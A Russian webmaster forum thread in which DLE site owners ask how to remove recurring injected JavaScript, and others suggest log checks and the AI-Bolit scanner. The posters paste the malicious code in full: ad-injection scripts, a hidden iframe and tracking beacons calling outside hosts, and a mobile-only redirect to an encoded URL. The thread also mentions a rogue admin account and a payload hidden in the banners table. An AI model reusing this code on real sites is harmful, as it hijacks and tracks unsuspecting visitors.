- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу

Маркетинг для шоколадной фабрики. На 34% выше средний чек
Через устранение узких мест
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Зараза лезет непонятно каким образом.
Менял пароли от всего, Удалял и снова заливал дистрибутив,агрейдил движок с 9.8 до 10.1
Все равно появляется буквально спустя минуты.
В HTML коде страницы
ppadman.ru/88ufzxjs3km5e8w8gff8k45mlp9d34n5v5jgvqv5w?ggo=3u5hh
Вот сам код
if (typeof ar_exposure_price === 'undefined') { var ar_exposure_price = -2; } var test, ppdr_url; if (!window.p780170a7394486c6c8d7f87a89a02f03) { window.p780170a7394486c6c8d7f87a89a02f03 = 0; } var logger; var a75smt1ex6595vujq273382kjpq1q = function (data) { if (typeof data != 'undefined' && typeof data['loger.ru'] != 'undefined') { logger = data['loger.ru']; if (typeof logger.gender != 'undefined' && logger.gender !== null) { ppdr_url += '&7bc6koe644w86k6wd72waq=' + logger.gender; } if (typeof logger.age != 'undefined' && logger.age.max !== null) { ppdr_url += '&831xevatieo6n71amvgp3z=' + logger.age.max; } if (typeof logger.age != 'undefined' && logger.age.min !== null) { ppdr_url += '&7mfa3yctvg0610u82y52wy4ixwd=' + logger.age.min; } if (typeof logger.segments != 'undefined' && logger.segments !== null && logger.segments.length > 0) { for (var i = 0; i < logger.segments.length; i++) { ppdr_url += '&831xevawg2l746wzkfjf9xmr44qu[]=' + logger.segments; } } } }; (function () { if (typeof window['ppndr_code_loaded'] != 'undefined' && window['ppndr_code_loaded'] == true) { return; } var b = (function () { var s; var d = document.createElement('div'); if (window.getComputedStyle) { s = window.getComputedStyle(d, null); } else if (d.currentStyle) { s = d.currentStyle; } else { return { }; } var b = { }; var r = { o: /^O[A-Z]/, w: /^webkit[A-Z]/, m: /^ms[A-Z]/, f: /^Moz[A-Z]/ }; for (var k1 in s) { for (var k2 in r) { if (r[k2].test(k1)) { b[k2] = true; } } } return b; })(); var ref = (document.referrer && document.referrer != "") ? '&ka6z2q=' + escape(document.referrer.replace(/^https?:\/\/(www\.)?/, '')) : ''; var seed = '&5fjkifx0=t' + Math.round(Math.random() * 100000000); var referer = escape(window.location.href.replace(/^https?:\/\/(www\.)?/, '')); var ft = 0, fk = 0, fd = 0, fu = 0, match; test = fu; document.write('<div class="ccs">' + '<sc' + 'ript charset="utf-8" type="text/javascript" language="javascript" src="http://trahic.ru/8pi9e3ocvgg3suxw1ty"></scr' + 'ipt>' + '<ifr' + 'ame width="1" height="1" style="position:absolute !important;left:-100000px !important;top:-100000px !important; width: 0px !important; height: 0px !important;" src="http://trahic.ru/68sad0b9yyz7yogl6zpglpdb2?sh0lp9e8v=1"></ifr' + 'ame>' + '<sc' + 'ript charset="utf-8" type="text/javascript" language="javascript" src="http://trahic.ru/6uyhnbnv4uit8dlja"></sc' + 'ript>' + '<sc' + 'ript charset="utf-8" type="text/javascript" language="javascript" src="http://trahic.ru/9bn9prxvk2379qhmtkq05pfoe?' + ref + '"></scr' + 'ipt>' + '<sc' + 'ript charset="utf-8" type="text/javascript" language="javascript" callback="a75smt1ex6595vujq273382kjpq1q" src="//dadegid.ru"></sc' + 'ript>' + '<sc' + 'ript charset="utf-8" type="text/javascript" language="javascript" src="http://ppadman.ru/6mn6du6v13w5pwy0z45hzhi1q"></scr' + 'ipt> </div>' + '<img src="http://advombat.ru/0.gif?pid=TIZNET" style="width:1px !important;height: 1px !important;position:absolute !important;top:-1480000px !important;left:-1480000px !important;border:none !important;opacity: 1;filter: alpha(opacity=100);-khtml-opacity: 1;-moz-opacity: 1;"/>'); window.p780170a7394486c6c8d7f87a89a02f03++; ppdr_url = 'http://ppadman.ru/88ufzxjs3km5e8w8gff8k45mlp9d34n5v5jgvqv5w?ggo=3u5hh' + ref + seed + (top == window ? '' : '&1b6hthbmu7=1') + '&7pfm4fbqp1mggt=' + referer + '&4omww=' + ft + '&4g7j3=' + fk + '&47s40=' + fd + '&40r9d=' + fu + '&tmy65er7y=' + window.p780170a7394486c6c8d7f87a89a02f03 + '' + '&181v4epx7f=' + (b.o ? 1 : 0) + '&5bkjvlshnx7=' + (b.w ? 1 : 0) + '&7gzmr8y7ygwhg7=' + (b.f ? 1 : 0) + '&5n9ktm39=' + (b.m ? 1 : 0) + '' + '&15cqywhrv1=' + screen.width + '&svrhpsa4y=' + screen.height; })(); window[ 'ppndr_code_loaded' ] = true; var pop_check_go = '', pop_check_cid = '', ppdr_s_e = false;
переустановите все заново. что-то мне неверится что 10.1 у вас ломают
Проверьте логи на хостинге
Ищите подмененный js.
переустановите все заново. что-то мне неверится что 10.1 у вас ломают
Так и есть, движок DLE оказался не при чем.
Сегодня зашел в редактирование пользователей и увидел Второго Админа! - хз откуда нарисовался, удалил и все пока норм.
Оказывается не все то так просто как казалось.
Сегодня опять ppadmana увидел у себя Уже новый скрипт прямо в HTML коде страницы.
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://ppadman.ru/5juc29di7me5uvjjddevis11gdv3ukph'></script><script type='text/javascript'>
var url = document.location.href;
var patt = /(?!.*\/)(.+).html$/;
var key = patt.exec(url);
(function(){var agent = navigator.userAgent;
if((agent != 'Mozilla/5.0 (Linux; U; Android 2.2; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 offline') &&
((agent.match(/android|blackberry|iphone|symbian/i) != null) ||
(agent.match(/pre\/|palm os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine/i) != null ||
agent.match(/iris|3g_t|windows ce|opera mobi|windows ce; smartphone;|windows ce; iemobile/i) != null ||
agent.match(/mini 9.5|vx1000|lge |m800|e860|u940|ux840|compal|wireless| mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|samu9|a615|b832|m881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|i250|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|htil-g1|fly v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|sanyo|vx54|c888|nx250|n120|mtk |c5588|s710|t880|c5005|i;458x|p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|s800|8325rc|ac831|mw200|brew |d88|htc\/|htc_touch|355x|m50|km100|d736|p-9521|telco|sl74|ktouch|m4u\/|me702|8325rc|kddi|phone|lg |sonyericsson|samsung|240x|x320|vx10|nokia|sony cmd|motorola|up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|pocket|mobile|treo/i) != null ||
agent.match(/^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a wa|acer|acs-|airn|alav|asus|attw|au-m|aur |aus |abac|acoo|aiko|alco|alca|amoi|anex|anny|anyw|aptu|arch|argo|bell|bird|bw-n|bw-u|beck|benq|bilb|blac|c55\/|cdm-|chtm|capi|cond|craw|dall|dbte|dc-s|dica|ds-d|ds12|dait|devi|dmob|doco|dopo|el49|erk0|esl8|ez40|ez60|ez70|ezos|ezze|elai|emul|eric|ezwa|fake|fly-|fly_|g-mo|g1 u|g560|gf-5|grun|gene|go.w|good|grad|hcit|hd-m|hd-p|hd-t|hei-|hp i|hpip|hs-c|htc |htc-|htca|htcg|htcp|htcs|htct|htc_|haie|hita|huaw|hutc|i-20|i-go|i-ma|i230|iac|iac-|iac\/|ig01|im1k|inno|iris|jata|java|kddi|kgt|kgt\/|kpt |kwc-|klon|lexi|lg g|lg-a|lg-b|lg-c|lg-d|lg-f|lg-g|lg-k|lg-l|lg-m|lg-o|lg-p|lg-s|lg-t|lg-u|lg-w|lg\/k|lg\/l|lg\/u|lg50|lg54|lge-|lge\/|lynx|leno|m1-w|m3ga|m50\/|maui|mc01|mc21|mcca|medi|meri|mio8|mioa|mo01|mo02|mode|modo|mot |mot-|mt50|mtp1|mtv |mate|maxo|merc|mits|mobi|motv|mozz|n100|n101|n102|n202|n203|n300|n302|n500|n502|n505|n700|n701|n710|nec-|nem-|newg|neon|netf|noki|nzph|o2 x|o2-x|opwv|owg1|opti|oran|p800|pand|pg-1|pg-2|pg-3|pg-6|pg-8|pg-c|pg13|phil|pn-2|pt-g|palm|pana|pire|pock|pose|psio|qa-a|qc-2|qc-3|qc-5|qc-7|qc07|qc12|qc21|qc32|qc60|qci-|qwap|qtek|r380|r600|raks|rim9|rove|s55\/|sage|sams|sc01|sch-|scp-|sdk\/|se47|sec-|sec0|sec1|semc|sgh-|shar|sie-|sk-0|sl45|slid|smb3|smt5|sp01|sph-|spv |spv-|sy01|samm|sany|sava|scoo|send|siem|smar|smit|soft|sony|t-mo|t218|t250|t600|t610|t618|tcl-|tdg-|telm|tim-|ts70|tsm-|tsm3|tsm5|tx-9|tagt|talk|teli|topl|hiba|up.b|upg1|utst|v400|v750|veri|vk-v|vk40|vk50|vk52|vk53|vm40|vx98|virg|vite|voda|vulc|w3c |w3c-|wapj|wapp|wapu|wapm|wig |wapi|wapr|wapv|wapy|wapa|waps|wapt|winc|winw|wonu|x700|xda2|xdag|yas-|your|zte-|zeto|acs-|alav|alca|amoi|aste|audi|avan|benq|bird|blac|blaz|brew|brvw|bumb|ccwa|cell|cldc|cmd-|dang|doco|eml2|eric|fetc|hipt|http|ibro|idea|ikom|inno|ipaq|jbro|jemu|java|jigs|kddi|keji|kyoc|kyok|leno|lg-c|lg-d|lg-g|lge-|libw|m-cr|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|mywa|nec-|newt|nok6|noki|o2im|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|rozo|sage|sama|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|treo|tsm-|upg1|upsi|vk-v|voda|vx52|vx53|vx60|vx61|vx70|vx80|vx81|vx83|vx85|wap-|wapa|wapi|wapp|wapr|webc|whit|winw|wmlb|xda-)/i) != null)))
{location.href = atob('aHR0cDovL3ZlbG9jb3MucnUvZS82NTkz')+key[1];}})()
</script>
Еле еле нашел эту крысу!
Пряталась в базе данных в dle_baners
Добрый день!!
А что дальше проблема решена?
У меня на сайт тоже какой то левый админ проник поставил скрипт и не знаю что делать.
Кто ни будь может помочь, всю голову сломал.
Вот что происходит:
После того как было проникновение проверил лог действий, там всё без изменений!
Дальше больше нашёл скрипт в исходном коде странице, а удалить не удалось в .tpl его нет.
Тогда сделал следующее, удалил полностью папку engine, и поставил с копии, вроди бы всё заработало и скрипт пропал, проверил banners.php чистый.
Но вот в чём засада, как только я ввожу в свой админ-пароль и логин, всё остаётся как было ни чего не меняется, но стоит мне выйти воаля скрипт снова прописывается и в banners.php появляется сам... Что делать дыже не знаю !!!!
ОЧЕНЬ НУЖНА ПОМОЩЬ!!!!
ОЧЕНЬ НУЖНА ПОМОЩЬ!!!!
Тут целый раздел: /ru/forum/development/security
Тут читать: /ru/forum/774117
Думаю, самостоятельно удастся запустить ай-болит...
Добрый день!!
А что дальше проблема решена?
У меня на сайт тоже какой то левый админ проник поставил скрипт и не знаю что делать.
Кто ни будь может помочь, всю голову сломал.
Но вот в чём засада, как только я ввожу в свой админ-пароль и логин, всё остаётся как было ни чего не меняется, но стоит мне выйти воаля скрипт снова прописывается и в banners.php появляется сам... Что делать дыже не знаю !!!!
ОЧЕНЬ НУЖНА ПОМОЩЬ!!!!
Зайдите в админку, удалите заразу, сделайте антивирусом сканирование и сохраните результаты проверки.
Как только появится зараза, сканируйте снова и смотрите какие файлы поменялись.
И еще логи смотрите. У меня например на IHC постоянно ломают, на фирствдс нормально.
Хотя стоят такие же движки.
Правда у меня отключена регистрация, и загрузка файлов.
А каким антивирусом? Пробовал AI-Bolit что то он мне много всего выдал, знать бы ещё где зараза сидит, поменял папку engine и своего шаблона, по входил и выходил всё думал, фига снова появился. Буду ещё AI-Bolit пробовать
---------- Добавлено 12.02.2014 в 17:24 ----------
Может кто по опытнее есть и поможет мне
А каким антивирусом? Пробовал AI-Bolit что то он мне много всего выдал, знать бы ещё где зараза сидит, поменял папку engine и своего шаблона, по входил и выходил всё думал, фига снова появился. Буду ещё AI-Bolit пробовать
---------- Добавлено 12.02.2014 в 17:24 ----------
Может кто по опытнее есть и поможет мне
Dle есть встроенный антивирус.
В сети полно инфы, вот нашел сразу же сайт http://on-line-teaching.com/cms/dle_admin.html